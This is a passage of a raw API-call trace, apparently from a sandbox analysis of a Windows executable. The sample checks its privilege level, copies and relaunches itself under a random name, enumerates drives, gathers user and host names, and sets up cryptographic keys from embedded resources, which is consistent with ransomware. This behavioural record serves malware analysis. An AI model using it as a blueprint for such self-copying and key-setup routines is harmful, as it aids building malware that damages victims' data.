[3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0050.687] EqualSid (pSid1=0x681850*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1f6b3fc*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0050.687] GetCurrentProcess () returned 0xffffffff [0050.687] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fbcc | out: TokenHandle=0x18fbcc*=0xec) returned 1 [0050.688] GetTokenInformation (in: TokenHandle=0xec, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fbc8 | out: TokenInformation=0x0, ReturnLength=0x18fbc8) returned 0 [0050.688] GetLastError () returned 0x7a [0050.688] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x68b190 [0050.688] GetTokenInformation (in: TokenHandle=0xec, TokenInformationClass=0x19, TokenInformation=0x68b190, TokenInformationLength=0x14, ReturnLength=0x18fbc8 | out: TokenInformation=0x68b190, ReturnLength=0x18fbc8) returned 1 [0050.688] GetSidSubAuthorityCount (pSid=0x68b198*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x68b199 [0050.688] GetSidSubAuthority (pSid=0x68b198*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x68b1a0 [0050.688] LocalFree (hMem=0x68b190) returned 0x0 [0050.688] CloseHandle (hObject=0xec) returned 1 [0050.688] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0050.688] GetFileType (hFile=0x7) returned 0x2 [0050.688] GetConsoleOutputCP () returned 0x1b5 [0050.689] GetFileType (hFile=0x7) returned 0x2 [0050.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Admin", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0050.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Admin", cchWideChar=5, lpMultiByteStr=0x1f79eec, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Admin", lpUsedDefaultChar=0x0) returned 5 [0050.689] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb94, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0050.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0050.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1f79ff4, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0050.689] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb94, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0050.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0050.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1f79ff4, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0050.689] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x18fbb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x18fbb4*=0x7, lpOverlapped=0x0) returned 1 [0050.690] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="IntegrityLevel = 4 (2-low,3-user,4-admin,5-system,6-protected_system)", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0050.690] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="IntegrityLevel = 4 (2-low,3-user,4-admin,5-system,6-protected_system)", cchWideChar=69, lpMultiByteStr=0x1fac18c, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IntegrityLevel = 4 (2-low,3-user,4-admin,5-system,6-protected_system)", lpUsedDefaultChar=0x0) returned 69 [0050.690] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb94, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0050.690] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0050.690] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1f7a054, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0050.690] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb94, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0050.690] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0050.690] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1f7a054, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0050.690] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x18fbb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x18fbb4*=0x47, lpOverlapped=0x0) returned 1 [0050.691] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.691] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f5cf24, csidl=37, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0050.693] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f964, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0050.693] GetTickCount () returned 0x1147050 [0050.693] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb38 | out: lpPerformanceCount=0x18fb38*=17103193089) returned 1 [0050.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb14, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0050.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb14, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0050.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb14, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0050.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb14, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0050.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb14, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0050.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb14, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0050.693] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f958, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0050.694] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C copy /V /Y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NWdEFn5V.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb28*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb18 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C copy /V /Y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NWdEFn5V.exe\"", lpProcessInformation=0x18fb18*(hProcess=0xf8, hThread=0xf4, dwProcessId=0x9e0, dwThreadId=0xb8c)) returned 1 [0050.708] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0053.202] CloseHandle (hObject=0xf8) returned 1 [0053.203] CloseHandle (hObject=0xf4) returned 1 [0053.203] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NWdEFn5V.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nwdefn5v.exe")) returned 0x20 [0053.203] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NWdEFn5V.exe\" -n", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb28*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb18 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NWdEFn5V.exe\" -n", lpProcessInformation=0x18fb18*(hProcess=0xf8, hThread=0xf4, dwProcessId=0x534, dwThreadId=0x76c)) returned 1 [0053.229] CloseHandle (hObject=0xf8) returned 1 [0053.229] CloseHandle (hObject=0xf4) returned 1 [0053.229] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0053.229] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0053.229] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0053.229] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0053.229] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0053.230] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0053.230] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0053.230] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0053.230] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0053.230] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0053.231] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0053.231] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0053.231] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0053.231] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0053.231] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0053.232] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0053.232] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0053.232] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0053.232] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0053.232] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0053.232] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0053.233] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0053.233] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0053.233] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0053.233] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.233] SetErrorMode (uMode=0x1) returned 0x0 [0053.233] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f97c, nVolumeNameSize=0x200, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18fb80, lpFileSystemFlags=0x18fb7c, lpFileSystemNameBuffer=0x18f77c, nFileSystemNameSize=0x200 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18fb80*=0xff, lpFileSystemFlags=0x18fb7c*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0053.234] SetErrorMode (uMode=0x0) returned 0x1 [0053.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVES]: C:\\", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0053.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVES]: C:\\", cchWideChar=14, lpMultiByteStr=0x1f72c0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[LDRIVES]: C:\\", lpUsedDefaultChar=0x0) returned 14 [0053.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb94, cchWideChar=2047 | out: lpWideCharStr="\r:ﮰ\x18sers\\5p5NrGJn0jS HALPmcxz\\DesktoE") returned 1 [0053.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0053.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1f7a09c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0053.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb94, cchWideChar=2047 | out: lpWideCharStr="\n:ﮰ\x18sers\\5p5NrGJn0jS HALPmcxz\\DesktoE") returned 1 [0053.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0053.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1f7a09c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0053.234] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x18fbb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x18fbb4*=0x10, lpOverlapped=0x0) returned 1 [0053.236] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0053.236] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[GENKEY]", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0053.236] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[GENKEY]", cchWideChar=8, lpMultiByteStr=0x1f72c0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[GENKEY]", lpUsedDefaultChar=0x0) returned 8 [0053.236] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18fbb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x18fbb4*=0x8, lpOverlapped=0x0) returned 1 [0053.237] QueryPerformanceCounter (in: lpPerformanceCount=0x18f4dc | out: lpPerformanceCount=0x18f4dc*=17357606334) returned 1 [0053.237] GetTickCount () returned 0x11472ff [0053.237] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x24f)) [0053.237] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x24f)) [0053.237] GetCurrentThreadId () returned 0xa68 [0053.237] GetCurrentThread () returned 0xfffffffe [0053.238] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec | out: lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec) returned 1 [0053.238] GetCurrentProcessId () returned 0xa7c [0053.238] GetCurrentProcess () returned 0xffffffff [0053.238] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec | out: lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec) returned 1 [0053.238] GetSystemTimes (in: lpIdleTime=0x18f4d4, lpKernelTime=0x18f4dc, lpUserTime=0x18f4e4 | out: lpIdleTime=0x18f4d4, lpKernelTime=0x18f4dc, lpUserTime=0x18f4e4) returned 1 [0053.238] QueryPerformanceFrequency (in: lpFrequency=0x18f4f8 | out: lpFrequency=0x18f4f8*=100000000) returned 1 [0053.238] GetUserNameA (in: lpBuffer=0x18f3f8, pcbBuffer=0x18f3f4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18f3f4) returned 1 [0053.241] GetComputerNameA (in: lpBuffer=0x18f3f8, nSize=0x18f3f4 | out: lpBuffer="XDUWTFONO", nSize=0x18f3f4) returned 1 [0053.241] QueryPerformanceCounter (in: lpPerformanceCount=0x18f4dc | out: lpPerformanceCount=0x18f4dc*=17358035030) returned 1 [0053.241] GetTickCount () returned 0x114730e [0053.242] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x25e)) [0053.242] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x25e)) [0053.242] Sleep (dwMilliseconds=0x0) [0053.304] QueryPerformanceCounter (in: lpPerformanceCount=0x18f4dc | out: lpPerformanceCount=0x18f4dc*=17364263522) returned 1 [0053.304] GetTickCount () returned 0x114732d [0053.304] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x27e)) [0053.304] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x27e)) [0053.304] Sleep (dwMilliseconds=0x1) [0053.319] QueryPerformanceCounter (in: lpPerformanceCount=0x18f4dc | out: lpPerformanceCount=0x18f4dc*=17365782360) returned 1 [0053.319] GetTickCount () returned 0x114733d [0053.319] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x28d)) [0053.319] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x28d)) [0053.319] GetCurrentThreadId () returned 0xa68 [0053.319] GetCurrentThread () returned 0xfffffffe [0053.320] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec | out: lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec) returned 1 [0053.320] GetCurrentProcessId () returned 0xa7c [0053.320] GetCurrentProcess () returned 0xffffffff [0053.320] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec | out: lpCreationTime=0x18f4d4, lpExitTime=0x18f4dc, lpKernelTime=0x18f4e4, lpUserTime=0x18f4ec) returned 1 [0053.320] GetSystemTimes (in: lpIdleTime=0x18f4d4, lpKernelTime=0x18f4dc, lpUserTime=0x18f4e4 | out: lpIdleTime=0x18f4d4, lpKernelTime=0x18f4dc, lpUserTime=0x18f4e4) returned 1 [0053.320] Sleep (dwMilliseconds=0x0) [0053.329] QueryPerformanceCounter (in: lpPerformanceCount=0x18f4dc | out: lpPerformanceCount=0x18f4dc*=17366825263) returned 1 [0053.329] GetTickCount () returned 0x114733d [0053.329] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x28d)) [0053.329] GetLocalTime (in: lpSystemTime=0x18f4d4 | out: lpSystemTime=0x18f4d4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x28d)) [0053.330] QueryPerformanceCounter (in: lpPerformanceCount=0x18f554 | out: lpPerformanceCount=0x18f554*=17366846890) returned 1 [0053.330] GetTickCount () returned 0x114733d [0053.330] GetLocalTime (in: lpSystemTime=0x18f54c | out: lpSystemTime=0x18f54c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x28d)) [0053.330] GetLocalTime (in: lpSystemTime=0x18f54c | out: lpSystemTime=0x18f54c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x18, wMilliseconds=0x28d)) [0053.330] GetCurrentThreadId () returned 0xa68 [0053.330] GetCurrentThread () returned 0xfffffffe [0053.330] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x18f54c, lpExitTime=0x18f554, lpKernelTime=0x18f55c, lpUserTime=0x18f564 | out: lpCreationTime=0x18f54c, lpExitTime=0x18f554, lpKernelTime=0x18f55c, lpUserTime=0x18f564) returned 1 [0053.330] GetCurrentProcessId () returned 0xa7c [0053.330] GetCurrentProcess () returned 0xffffffff [0053.330] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x18f54c, lpExitTime=0x18f554, lpKernelTime=0x18f55c, lpUserTime=0x18f564 | out: lpCreationTime=0x18f54c, lpExitTime=0x18f554, lpKernelTime=0x18f55c, lpUserTime=0x18f564) returned 1 [0053.330] GetSystemTimes (in: lpIdleTime=0x18f54c, lpKernelTime=0x18f554, lpUserTime=0x18f55c | out: lpIdleTime=0x18f54c, lpKernelTime=0x18f554, lpUserTime=0x18f55c) returned 1 [0057.634] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x168 [0057.635] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0057.635] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0057.635] CryptAcquireContextW (in: phProv=0x18f5e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18f5e4*=0x694688) returned 1 [0058.013] CryptGenRandom (in: hProv=0x694688, dwLen=0x28, pbBuffer=0x18f5f8 | out: pbBuffer=0x18f5f8) returned 1 [0058.013] CryptReleaseContext (hProv=0x694688, dwFlags=0x0) returned 1 [0058.014] ReleaseMutex (hMutex=0x168) returned 1 [0058.014] ReleaseMutex (hMutex=0x168) returned 1 [0058.014] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0058.014] ReleaseMutex (hMutex=0x168) returned 1 [0058.014] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ef099c, cbMultiByte=256, lpWideCharStr=0x18e60c, cchWideChar=2047 | out: lpWideCharStr="2660EAA9CA5C3071CB7CEE13B28E31773E911E7D7AE4385264009F4759A69B8CC43C00A253F2D9D7B2ACA1ACEE929287D019FA05131606C176C60B38CD10469700CC1C91CE0EFF4CC8A774B680E68EB2DD0B552494E168E24D0BF5457D3495655A325B4DB40EAAA6B36C449BF9AB2BF6E9A9A549A816ACE0AD017008623893CD￿￿￿￿￿￿￿￿￿￿￿\x01") returned 256 [0058.015] FindResourceW (hModule=0x400000, lpName="MPUB", lpType=0xa) returned 0x4f5470 [0058.015] LoadResource (hModule=0x400000, hResInfo=0x4f5470) returned 0x5263e0 [0058.015] SizeofResource (hModule=0x400000, hResInfo=0x4f5470) returned 0x192 [0058.015] LockResource (hResData=0x5263e0) returned 0x5263e0 [0058.015] FreeResource (hResData=0x5263e0) returned 0 [0058.016] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0058.016] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0058.016] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0058.016] LockResource (hResData=0x526358) returned 0x526358 [0058.016] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 